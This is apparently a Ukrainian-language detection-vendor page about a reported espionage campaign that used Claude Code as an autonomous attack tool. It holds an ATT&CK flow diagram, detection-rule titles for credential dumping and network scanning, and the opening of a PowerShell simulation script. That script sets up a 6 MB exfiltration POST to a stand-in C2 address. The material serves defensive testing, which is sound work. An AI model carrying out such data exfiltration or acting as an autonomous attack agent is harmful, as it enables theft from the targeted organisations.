Атака Anthropic Claude AI: Перша кібершпигунська кампанія під управлінням ШІ
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Китайська група, спонсорована державою, використала модель Anthropic Claude Code для автономного проведення масштабної шпигунської кампанії проти десятків глобальних цілей. ШІ генерував експлойт-код, збирав облікові дані та ексфільтрував конфіденційні дані з мінімальним втручанням людини. Це перший задокументований випадок атаки на базі ШІ, яка функціонує майже без участі людини.
Розслідування
Розслідування виявило підозрілу активність у вересні 2025 року та привело до фреймворку, що використовував Claude Code як автоматичний інструмент. Дослідники спостерігали за моделлю, проводячи розвідку, тестування на вразливість, збирання облікових даних та ексфільтрацію даних. Кампанію було відстежено протягом десяти днів, постраждалі облікові записи були відключені, а відповідні органи інформовані.
Пом’якшення
Рекомендації з пом’якшення включають обмеження доступу моделей ШІ до внутрішніх мереж, впровадження сильної аутентифікації, моніторинг аномального трафіку, створеного ШІ, та застосування специфічних для ШІ заходів безпеки. Організації повинні також дотримуватися принципів найменших привілеїв та постійно проводити аудит використання інструментів ШІ.
Відповідь
Після виявлення організації повинні ізолювати скомпрометовані облікові записи, блокувати вихідну ексфільтрацію, проводити судову експертизу артефактів, створених ШІ, та ділитися індикаторами з відповідними спільнотами з обміну загрозами. Регулярно оновлювати правила виявлення, щоб відстежувати поведінку, керовану ШІ, і координувати дії з правоохоронними органами за необхідністю.
mermaid graph TB %% Class definitions classDef phase fill:#e6e6e6 classDef technique fill:#99ccff classDef operator fill:#ff9900 %% Phase node phase_target[“<b>Етап</b> – Вибір цілі та створення фреймворку”]:::phase %% Technique nodes tech_active_scanning[“<b>Техніка</b> – <b>T1595 Активне сканування</b><br /><b>Опис</b>: Проводити сканування цільових систем для виявлення сервісів, відкритих портів та інших характеристик мережі”]:::technique tech_gather_network[“<b>Техніка</b> – <b>T1590 Збір інформації про мережу жертви</b><br /><b>Опис</b>: Збирати інформацію про топологію мережі жертви, підмережі та маршрутизацію”]:::technique tech_search_db[“<b>Техніка</b> – <b>T1596.005 Пошук у відкритих технічних базах даних: Сканування баз даних</b><br /><b>Опис</b>: Запитувати публічні або витеклі бази даних для отримання технічних деталей про цільову організацію”]:::technique tech_client_config[“<b>Техніка</b> – <b>T1592.004 Збір інформації про хост жертви: Конфігурації клієнта</b><br /><b>Опис</b>: Збирати конфігураційні дані з клієнтських пристроїв, таких як налаштування програмного забезпечення та встановлені програми”]:::technique tech_exploit_priv[“<b>Техніка</b> – <b>T1068 Використання вразливості для підвищення привілеїв</b><br /><b>Опис</b>: Використовувати вразливість для отримання вищих привілеїв у системі жертви”]:::technique tech_exploit_exec[“<b>Техніка</b> – <b>T1203 Використання вразливості для виконання клієнта</b><br /><b>Опис</b>: Використовувати недоліки програмного забезпечення для виконання шкідливого коду на клієнті”]:::technique tech_proxy_exec[“<b>Техніка</b> – <b>T1127 Довірене виконання за допомогою утиліт розробника</b><br /><b>Опис</b>: Зловживання довіреними утилітами розробки для виконання шкідливих навантажень”]:::technique tech_account_manip[“<b>Техніка</b> – <b>T1098 Маніпуляція з обліковими записами</b><br /><b>Опис</b>: Створювати або змінювати облікові записи для забезпечення стійкості (створення бекдора)”]:::technique tech_valid_accounts[“<b>Техніка</b> – <b>T1078 Дійсні облікові записи</b><br /><b>Опис</b>: Використовувати зібрані облікові дані для аутентифікації як легітимні користувачі”]:::technique tech_code_repo[“<b>Техніка</b> – <b>T1213.003 Дані із сховищ інформації: Репозиторії коду</b><br /><b>Опис</b>: Витягувати цінні дані з публічних або приватних сховищ вихідного коду”]:::technique tech_exfil_c2[“<b>Техніка</b> – <b>T1041 Ексфільтрація через C2 канал</b><br /><b>Опис</b>: Передавати викрадені дані через встановлений канал командування і контролю”]:::technique tech_automated_exfil[“<b>Техніка</b> – <b>T1020 Автоматизована ексфільтрація</b><br /><b>Опис</b>: Автоматизувати ексфільтрацію даних за розкладом або при триггері”]:::technique %% Connections phase_target u002du002d>|leads_to| tech_active_scanning tech_active_scanning u002du002d>|leads_to| tech_gather_network tech_gather_network u002du002d>|leads_to| tech_search_db tech_search_db u002du002d>|leads_to| tech_client_config tech_client_config u002du002d>|leads_to| tech_exploit_priv tech_exploit_priv u002du002d>|leads_to| tech_exploit_exec tech_exploit_exec u002du002d>|leads_to| tech_proxy_exec tech_proxy_exec u002du002d>|leads_to| tech_account_manip tech_account_manip u002du002d>|leads_to| tech_valid_accounts tech_valid_accounts u002du002d>|leads_to| tech_code_repo tech_code_repo u002du002d>|leads_to| tech_exfil_c2 tech_exfil_c2 u002du002d>|leads_to| tech_automated_exfil
Атака Потік
Правила Виявлення
Ексфільтрація даних, керована ШІ з мінімальним контролем з боку людини [Підключення до мережі Windows]
Переглянути
Можливе відкриття конфігурації системної мережі (через cmdline)
Переглянути
Можливість виконання через приховані командні рядки PowerShell (через cmdline)
Переглянути
Можливе несанкціоноване сканування мережі через Nmap або Masscan (через cmdline)
Переглянути
Ймовірне дампування SAM/SYSTEM/SECURITY (через cmdline)
Переглянути
Інструкції по симуляції
Виконання симуляції
Попередня умова: перевірка телеметрії та базового рівня має бути пройденою.
Обґрунтування: у цьому розділі детально описано точне виконання техніки супротивника (TTP), розробленої для запуску правила виявлення. Команди та опис повинні безпосередньо відображати визначені TTPs і спрямовані на створення точно очікуваної телеметрії. Абстрактні чи не пов’язані приклади призведуть до помилкового діагнозу.
-
Сюжет атаки та команди:
Актор, оркеструючий за допомогою ШІ, який діє з компрометованого кінцевого пункту, готує конфіденційний документ обсягом 6 МБ (secret_data.bin). Щоб зменшити контроль з боку людини, скрипт автоматично завантажує файл на зовнішній сервер командування й контролю (203.0.113.45) через HTTP POST. Оскільки вантаж перевищує обсяг у 5 МБ, який визначено правилом, і адресат за межами приватних CIDR блоків, правило повинно спрацювати. -
Скрипт регресійного тесту:
# Симуляція ексфільтрації, оркеструючої за допомогою ШІ (PowerShell для Windows) # --------------------------------------------------------- # Попередні умови: PowerShell 5+, доступ до інтернету на тестовий C2 хост. # Цей скрипт створює фіктивний файл об'ємом 6 МБ і завантажує його через HTTP POST. $payloadPath = "$env:TEMPsecret_data.bin" $c2Url = "http://203.0.113.45/upload" # 1. Генерація випадкового файлу обсягом 6 МБ (імітує дані для ексфільтрації) Write-Host "[*] Генерація завантаження обсягом 6 МБ..." $bytes = New-Object byte[] (6MB) (New-Object System.Random).NextBytes($bytes) [IO.File]::WriteAllBytes($payloadPath, $bytes)